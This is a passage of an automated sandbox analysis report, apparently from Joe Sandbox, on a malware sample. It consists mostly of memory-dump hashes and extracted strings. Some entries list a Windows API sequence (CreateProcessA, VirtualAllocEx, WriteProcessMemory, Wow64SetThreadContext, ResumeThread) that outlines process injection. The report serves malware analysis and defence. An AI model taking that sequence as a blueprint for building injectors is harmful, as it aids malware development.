                                                                      • Instruction Fuzzy Hash: BE9158B4D15209EFDB48DFA6E58059EFBF2FF89350F10A02AE515AB264D7349906CF40
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: z^I
                                                                      • API String ID: 0-307258731
                                                                      • Opcode ID: 632fb7dcf51d61aee09b08818b6929c1c4521e0ea18f3afec2a4f41b54bec172
                                                                      • Instruction ID: b853ee20565c7b9a2af7f187eef05bad2edef25de6029496fcf6681d29803afb
                                                                      • Opcode Fuzzy Hash: 632fb7dcf51d61aee09b08818b6929c1c4521e0ea18f3afec2a4f41b54bec172
                                                                      • Instruction Fuzzy Hash: B3A12675E002098FDB44DFAAC884ADEFBB2EF88310F14942AD455BB358D7349941CFA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: z^I
                                                                      • API String ID: 0-307258731
                                                                      • Opcode ID: 6531fad31de58f2fdc8da4339e6d212ecb03851b23566faab64b7de31140a0bf
                                                                      • Instruction ID: 5958f812c20d2275f1f7e92ae37bd5a240b01b68570bcda1fc15a937fbc798b6
                                                                      • Opcode Fuzzy Hash: 6531fad31de58f2fdc8da4339e6d212ecb03851b23566faab64b7de31140a0bf
                                                                      • Instruction Fuzzy Hash: CBA1F274E002198FDB48DFAAC984ADEFBB2FF88300F24942AD515AB358D7749945CF64
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: z^I
                                                                      • API String ID: 0-307258731
                                                                      • Opcode ID: 70330e87c7f5d00849b607e506628ee338b6d36b83de3bba00311e865b28634e
                                                                      • Instruction ID: 0f3601831ad4231b74b064a3e1c5e08385a3a6f6174f6e3c0eb6cedb53e588dd
                                                                      • Opcode Fuzzy Hash: 70330e87c7f5d00849b607e506628ee338b6d36b83de3bba00311e865b28634e
                                                                      • Instruction Fuzzy Hash: 8391D274E002198FDB48DFAAC584AAEFBB2FF88300F24942AD515BB358D7749945CF64
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5=6
                                                                      • API String ID: 0-2897083178
                                                                      • Opcode ID: 3c0a5f43197d7920edad795bee1b0a8e1e0343784ecfd24f57b6b44e7e76f871
                                                                      • Instruction ID: cfd5818e7dfa691eb306aba1f491a69dff835231d31a5817e1add8497d263cb3
                                                                      • Opcode Fuzzy Hash: 3c0a5f43197d7920edad795bee1b0a8e1e0343784ecfd24f57b6b44e7e76f871
                                                                      • Instruction Fuzzy Hash: 5D718A75E1621A9FCB44DFA6D8445AEFBF2FF89240F00E52AC026E7254D7389A01CF90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5=6
                                                                      • API String ID: 0-2897083178
                                                                      • Opcode ID: 38462da0b8f4385efc7e24590aeb972298f4035903ec0c417dd0399581ab1520
                                                                      • Instruction ID: 0debfcb91b06bfed53c586649d0c72dbbab21115ca8035bca8fe45ab3a0a6e57
                                                                      • Opcode Fuzzy Hash: 38462da0b8f4385efc7e24590aeb972298f4035903ec0c417dd0399581ab1520
                                                                      • Instruction Fuzzy Hash: 08617974E1620A9FCB48DFA6D9444AEFBF2FF89240F00E56AC016E7214D7389A01CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9bf87a4efe3ebd47ba2e1f8fd1f5d6f8791c28b44cc148f828087137e26f021a
                                                                      • Instruction ID: 75b0545279d27b36f159514e46b87702f9019bdc3ec53892897819a4a66e57fb
                                                                      • Opcode Fuzzy Hash: 9bf87a4efe3ebd47ba2e1f8fd1f5d6f8791c28b44cc148f828087137e26f021a
                                                                      • Instruction Fuzzy Hash: ABE1C071B016048FDB65EB79C850BAEB7F6EF88300F1484ADD54ADB291CB74E901CB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60102e19426677a21994f975ddd09e93674c636339c8bfc4dbf214405920d84c
                                                                      • Instruction ID: 2e7cc858dc301c8f853ec65ede4531fbff37db62e0445bf3edb67cfb34d09f17
                                                                      • Opcode Fuzzy Hash: 60102e19426677a21994f975ddd09e93674c636339c8bfc4dbf214405920d84c
                                                                      • Instruction Fuzzy Hash: D33128B1E006188BEB18CFA6D8447DEBBB7AFC8300F14C06AD509A6268DB345A45CF90

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 00DFD556
                                                                      • GetCurrentThread.KERNEL32 ref: 00DFD593
                                                                      • GetCurrentProcess.KERNEL32 ref: 00DFD5D0
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DFD629
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 2446929c615dc3a762c9a771610eb862ac0164b20a308a3019dc7adc082334d7
                                                                      • Instruction ID: 9de8f714dca0a68dab70ce22310fa4cd060db38d1116d76a448baaea8182ebb7
                                                                      • Opcode Fuzzy Hash: 2446929c615dc3a762c9a771610eb862ac0164b20a308a3019dc7adc082334d7
                                                                      • Instruction Fuzzy Hash: CA5165B0901349DFDB04DFAAD548BAEBBF2EF88314F20C459E109A7350D7749944CB66

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 00DFD556
                                                                      • GetCurrentThread.KERNEL32 ref: 00DFD593
                                                                      • GetCurrentProcess.KERNEL32 ref: 00DFD5D0
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DFD629
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 70ef8233eab72bd0dbfeda46793be13ac3cf54862c558f0abb312fa0be015677
                                                                      • Instruction ID: 48040c9a8b282ad80484ab33ba3725f318e234deef8ddebca26256a15a963fbb
                                                                      • Opcode Fuzzy Hash: 70ef8233eab72bd0dbfeda46793be13ac3cf54862c558f0abb312fa0be015677
                                                                      • Instruction Fuzzy Hash: 6D5145B0901349CFDB04DFAAD548BAEBBF2EF88314F24C459D509A73A0D7749984CB66

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD489E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 48f78ada9ddd84fad1e7dd81427658d327c87988085758f4478eef7d6649b6d7
                                                                      • Instruction ID: c234a5c2cefccb31ada0ac0bce3ab5dcd1081b1b1cd141fa4d8455871e2957d9
                                                                      • Opcode Fuzzy Hash: 48f78ada9ddd84fad1e7dd81427658d327c87988085758f4478eef7d6649b6d7
                                                                      • Instruction Fuzzy Hash: 60A17B70D00219EFEB60DFA9C841BEEBBF2BF49310F148569E858A7240DB749985CF91

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DD489E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6dd0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: c88f91847b8eb8bd2b8f2856dd48127f7b23152af95cf76004a6b040f33f36ae
                                                                      • Instruction ID: 3f628e504b9c599312c21f581a5314d4874e12c15cad1dd86710939dad1d1c67
                                                                      • Opcode Fuzzy Hash: c88f91847b8eb8bd2b8f2856dd48127f7b23152af95cf76004a6b040f33f36ae
                                                                      • Instruction Fuzzy Hash: F8918A70D00219DFEB60DFA9C8417EEBBF2BF49310F148169E858A7240DB749985CF91

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00DFB09E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 353447a5b72b8477f07b23945b6f52c811d1d8963b3c53206ff40a0a0491c0dc
                                                                      • Instruction ID: 40cabb82472c9cbab58a1ef695725c64094847dfd66c728b8f46c9ed3737ef55
                                                                      • Opcode Fuzzy Hash: 353447a5b72b8477f07b23945b6f52c811d1d8963b3c53206ff40a0a0491c0dc
                                                                      • Instruction Fuzzy Hash: 467159B0A00B098FD724DF29D05176ABBF1FF88304F05892DE58ADBA40DB34E945CBA1

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a5283ac723bcf585424453ba6ec0acdce3aee61dd737a991c73b4de81af1232f
                                                                      • Instruction ID: 9bb2f909b0db28b65fd4a6fcddcf1323d569aa836a0e0ac391c328f1a32dadd3
                                                                      • Opcode Fuzzy Hash: a5283ac723bcf585424453ba6ec0acdce3aee61dd737a991c73b4de81af1232f
                                                                      • Instruction Fuzzy Hash: 7841DF71801A4DCFDF14CBA8E8453BDBBB0AF46320F258289C345AB259C772A946CF61

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 00DF59C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: d6f4c3e709d1b149fa6ac0c9a78a68f75f7566092676be4a3ae1d517e76a79e1
                                                                      • Instruction ID: 877e35d2f1c611761cca7163e54befc3765ae7c2634fe12cb33c38de9ae77629
                                                                      • Opcode Fuzzy Hash: d6f4c3e709d1b149fa6ac0c9a78a68f75f7566092676be4a3ae1d517e76a79e1
                                                                      • Instruction Fuzzy Hash: 0341E0B0C0061DCBEF24CFAAC98479DBBB5BF88314F24815AD508AB255DB716946CF50

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 00DF59C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_df0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 26adf2af938208b5d15edc1837a02bb2eecaf09922a51e026fcd80658b64017e
                                                                      • Instruction ID: c8dd9e629b69b88949e2242bc4f42415bbdf2e4e871679475ad3d9f214113902
                                                                      • Opcode Fuzzy Hash: 26adf2af938208b5d15edc1837a02bb2eecaf09922a51e026fcd80658b64017e
                                                                      • Instruction Fuzzy Hash: 5741F3B0C0071DCBEF24CFAAC84479EBBB5BF89304F25816AD508AB255D7B16945CFA0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD4070
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD4070
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD4150
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD3EC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD3EC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD4150
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DFD7A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DFD7A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DE7D33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD3F8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DE7D33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD3F8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      • API ID: ResumeThread
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06DD6995
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      • API ID: ResumeThread
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06DD6995
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390487870.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00DFB09E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2385332930.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                      • Opcode Fuzzy Hash: 1d6df7c8488dc5ebb6a45168ef1d93bad280c92c2fe099797bede53048d9dc56
                                                                      • Instruction Fuzzy Hash: FE2192755093C09FCB12CF24D990715BF72EB46314F28C5EAD8498F2A7C33A980ACB62
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2384840897.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d1d000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                      • Instruction ID: 3dac4801e846013de6f13bf529bf0cf7d33c0f00682d5b2b9cee970f94edce7d
                                                                      • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                      • Instruction Fuzzy Hash: D011E676504240EFCB15CF10D5C4B56BF72FB94324F28C6A9D8090B657C33AE85ACBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2384910167.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d2d000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                      • Instruction ID: 850f96f8a0e576b3b71cb4174c537d8791acf35ee78f92f31dcd811f8cdb47f7
                                                                      • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                                      • Instruction Fuzzy Hash: 10118B75904284DFDB15CF10D5C4B15FBA2FF94318F28C6A9D8494B696C33AD84ACB62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {#L
                                                                      • API String ID: 0-1361971085
                                                                      • Opcode ID: 0aa3ee0e4a51cd193a2b8a4b4b0690ea3ce33832e895be56c4d69af02630c8f3
                                                                      • Instruction ID: e284d57a0de0251a1584ee3b021187d1221de816a9f8d755ef9a4c6a044a2654
                                                                      • Opcode Fuzzy Hash: 0aa3ee0e4a51cd193a2b8a4b4b0690ea3ce33832e895be56c4d69af02630c8f3
                                                                      • Instruction Fuzzy Hash: 46D13675E05219CFDB58CFAAD98059EFBF2BF89300F18D52AD419AB228D7309942CF50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {#L
                                                                      • API String ID: 0-1361971085
                                                                      • Opcode ID: 8b125a9943db0768d33e71c6b89190752932585808686a8e1b6b2709ac9adc31
                                                                      • Instruction ID: 38dec3ce837696c638d9af8435fd48f5ccc38bea270eae1a937da4da0d096187
                                                                      • Opcode Fuzzy Hash: 8b125a9943db0768d33e71c6b89190752932585808686a8e1b6b2709ac9adc31
                                                                      • Instruction Fuzzy Hash: D6D13775E05219DFDB58CFAAD98059EFBF2BF89300F18D42AD419AB224D7349942CF50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 98R
                                                                      • API String ID: 0-576591972
                                                                      • Opcode ID: 9d0c60f3c7266812acece9d899eb2a1ad7b7f5e8a004a3444d220ab2ca402eba
                                                                      • Instruction ID: e8fa97a19600031de62793d9d360427c8086ab357d33016489763f0cf1d44fda
                                                                      • Opcode Fuzzy Hash: 9d0c60f3c7266812acece9d899eb2a1ad7b7f5e8a004a3444d220ab2ca402eba
                                                                      • Instruction Fuzzy Hash: 557126B5E0420ADFDB44DF99D8819AEFBB1FB89310F148529D465AB314D334AA42CF94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: iUfo
                                                                      • API String ID: 0-3820436262
                                                                      • Opcode ID: 016654cdbd158a5c622df8bc3a9714217e1501ffddd738c6ac17dbb96bef2e68
                                                                      • Instruction ID: 59258c32c562b86b5ef87be5b5fc194e039507dfe74ca96e84706e566ed2d744
                                                                      • Opcode Fuzzy Hash: 016654cdbd158a5c622df8bc3a9714217e1501ffddd738c6ac17dbb96bef2e68
                                                                      • Instruction Fuzzy Hash: 5A51D0B8E052199FDB48DFA9D9856AEFBF2FF88301F10902AD405B7254E7389941CB94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: iUfo
                                                                      • API String ID: 0-3820436262
                                                                      • Opcode ID: dc319b41fd9d29d02b829d3304b1e3d0e3ce29af4f88919c53af3fa65f091471
                                                                      • Instruction ID: d58c627efd5aed50c954e2adfd5c630d345df1925fd482ea2edaf25dddfc87d1
                                                                      • Opcode Fuzzy Hash: dc319b41fd9d29d02b829d3304b1e3d0e3ce29af4f88919c53af3fa65f091471
                                                                      • Instruction Fuzzy Hash: CD51F2B8E052199FDB48DFA9D9456EEBBF2FF88301F14902AD405B7254E7389A01CB94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -2m
                                                                      • API String ID: 0-2686427999
                                                                      • Opcode ID: 4d3d510a93bd372ad4757b074547a455ad64615ee94b888d29f15e724fe50352
                                                                      • Instruction ID: e327c79d0e906381af0dcaa1909c1a124170171c6f2ef5cdb1e0a56b748d23af
                                                                      • Opcode Fuzzy Hash: 4d3d510a93bd372ad4757b074547a455ad64615ee94b888d29f15e724fe50352
                                                                      • Instruction Fuzzy Hash: 44512BB4E00219CFDB08DFA9D9406AEFBF2EF88301F24D02AD45AA7254D7349941CBA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: w7e^
                                                                      • API String ID: 0-1657886525
                                                                      • Opcode ID: 17554626920a377f390df431731ade4a3ec34557dc036a9cbb443a016b3bfed8
                                                                      • Instruction ID: a79541e05337f0ad3769471773f61ca0864fa08e80af73d689598e27e006767f
                                                                      • Opcode Fuzzy Hash: 17554626920a377f390df431731ade4a3ec34557dc036a9cbb443a016b3bfed8
                                                                      • Instruction Fuzzy Hash: FC4147B5D05219DFDF44DFAAC9406EEFBB1FB89200F14982AC416B7244D3388642CFA8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: w7e^
                                                                      • API String ID: 0-1657886525
                                                                      • Opcode ID: 9a58e53d87794fcbcb0bcc1c848c77ffd917372d0a180b5297f4baf16757b3bf
                                                                      • Instruction ID: 3b6a2f6653af5efdfa58cac1a00a05529371850cd4cba9c4d0fe25d618cd8bf3
                                                                      • Opcode Fuzzy Hash: 9a58e53d87794fcbcb0bcc1c848c77ffd917372d0a180b5297f4baf16757b3bf
                                                                      • Instruction Fuzzy Hash: 7B4138B1D05219DFDF44CFA6C8406EEFBB1FB89241F14982AC016B7294D7388642DF99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0ni
                                                                      • API String ID: 0-1488673370
                                                                      • Opcode ID: fc22e4488bcd3239c6436fa792da435db4c7f37e4e79935921f25104ddc0fa1f
                                                                      • Instruction ID: c6259e97535bc75dddf16340346cf80307de3bce36fdb00812fb0cf43b6def4d
                                                                      • Opcode Fuzzy Hash: fc22e4488bcd3239c6436fa792da435db4c7f37e4e79935921f25104ddc0fa1f
                                                                      • Instruction Fuzzy Hash: C8514A71E01618CBDB68DF6B9D4479AFAF3AFC8300F14C1BA850CA6254EB301A858F51
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
